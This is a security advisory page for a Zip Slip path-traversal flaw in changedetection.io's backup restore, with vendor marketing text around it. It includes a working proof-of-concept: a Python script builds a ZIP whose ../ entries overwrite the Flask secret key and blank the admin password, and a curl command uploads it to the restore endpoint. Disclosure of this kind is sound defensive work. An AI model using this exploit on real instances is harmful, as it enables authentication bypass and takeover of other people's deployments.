CVE

CVE-2026-29065

changedetection.io has Zip Slip vulnerability in the backup restore functionality

CVE

CVE-2026-29065

changedetection.io has Zip Slip vulnerability in the backup restore functionality

Summary

A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives.

Details

A Zip Slip vulnerability in the backup restore functionality allows arbitrary file overwrite via path traversal in uploaded ZIP archives. The application uses zipfile.extractall() without validating entry paths, allowing ../ sequences to escape the extraction directory.

Vulnerable Code (lines 50-53):

def restore_backup(self, filename):
    with zipfile.ZipFile(filename, 'r') as zip_ref:
        # VULNERABLE: No path validation before extraction
        zip_ref.extractall(self.datastore_path)

The extractall() function preserves the relative paths stored within the ZIP archive. When a malicious ZIP contains entries with ../ path traversal sequences, these files are extracted outside the intended directory.

| Path in ZIP | Target File | Impact |

| --- | --- | --- |

| ../secret.txt | Flask secret key | Session forgery, auth bypass |

| ../changedetection.json | App settings | Disable password, inject backdoor |

| ../url-watches.json | Watch index | Inject malicious watches |

| ../{uuid}/watch.json | Watch config | Modify any watch |

Attacker uploads ZIP via the backup restore functionality at /backups/restore

Application extracts files without validation, writing attacker content to sensitive locations

PoC

Step 1: Create Malicious ZIP

import zipfile
import json
with zipfile.ZipFile("zipslip.zip", "w") as zf:
    # Escape extraction directory with ../
    zf.writestr("../secret.txt", "ATTACKER-CONTROLLED-SECRET")
    
    zf.writestr("../changedetection.json", json.dumps({
        "settings": {"application": {"password": ""}}
    }))
    
    zf.writestr("../pwned-uuid-1234/watch.json", json.dumps({
        "url": "https://attacker.com/zipslip-pwned",
        "title": "🔴 ZIPSLIP-PROOF"
    }))

Step 2: Upload via Restore Endpoint

```curl -X POST "http://target:5000/backups/restore/start" \

-F "zip_file=@zipslip.zip" \

-F "include_watches=y" \

-F "include_settings=y"

```

###Step 3: Verify Path Traversal

Check if watch escaped to /datastore/

###ls -la /datastore/

Look for: pwned-uuid-1234/

Verify in UI

curl "http://target:5000/" | grep "ZIPSLIP"

Package Versions Affected

No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading

Detect compatible fix

Apply safe remediation

Fix with a single pull request

CVSS Version

8.8

4.0

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Related Resources

No items found.

References

https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-25g8-2mcf-fcx9, https://nvd.nist.gov/vuln/detail/CVE-2026-29065, https://github.com/dgtlmoon/changedetection.io/commit/1d7d812eb0faab37042246e2fbce04f29bb1b3aa, https://github.com/dgtlmoon/changedetection.io, https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.4

Severity

9.1

CVSS Score

Basic Information

Ecosystem

Base CVSS

9.1

EPSS Probability

0.00059%

EPSS Percentile

0.18248%

Introduced Version

Fix Available

0.54.4

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.

Fix Without Upgrading

Get a Demo

Let's Patch It!

CVE-2026-29065

CVE-2026-29065

Summary

Details

PoC

Check if watch escaped to /datastore/

Look for: pwned-uuid-1234/

Verify in UI

Package Versions Affected

Automatically patch vulnerabilities without upgrading

CVSS Version

Related Resources

References

Severity

9.1

Basic Information

Fix Critical Vulnerabilities Instantly